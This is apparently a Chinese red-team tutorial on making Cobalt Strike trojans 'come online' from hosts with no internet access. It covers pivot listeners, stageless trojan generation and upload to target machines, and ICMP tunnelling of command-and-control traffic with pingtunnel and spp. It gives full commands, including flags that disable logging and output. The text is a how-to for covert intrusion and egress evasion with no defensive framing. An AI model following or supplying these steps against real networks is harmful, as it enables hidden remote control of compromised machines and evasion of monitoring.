主机中转监听横向上线不出网域控
设置转发上线
设置监听地址和监听端口
生成无阶段木马
选择刚才新建的监听,生成木马
通过其他方式把木马上传到目标机器,并运行
仅ICMP出网上线cs(pingtunnel)
PingTunnel是一款常用的ICMP隧道工具 下载地址:https://github.com/esrrhs/pingtunnel/releases 下载对应系统的PingTunnel
CS服务器运行PingTunnel服务端
代码语言:javascript复制./pingtunnel -type server客户端开启监听,并把流量通过icmp服务器转发给CS服务器
代码语言:javascript复制pingtunnel.exe -type client -l :4466 -s icmpserver_ip -t c2_server_ip:9988 -tcp 1 -noprint 1 -nolog 1CS新建监听
生成无阶段木马
监听器选择刚才创建的内网监听
上传到目标机器,运行,木马上线
ICMP出网上线cs(SPP)
spp是一个简单强大的网络代理工具。
服务器开启SPP服务端
代码语言:javascript复制./spp -type server -proto ricmp -listen 0.0.0.0客户端
代码语言:javascript复制spp.exe -name "cs" -type proxy_client -server x.x.x.x -fromaddr :4466 -toaddr :9988 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1和上面新建监听器一样,也是生成无阶段木马,可成功上线CS
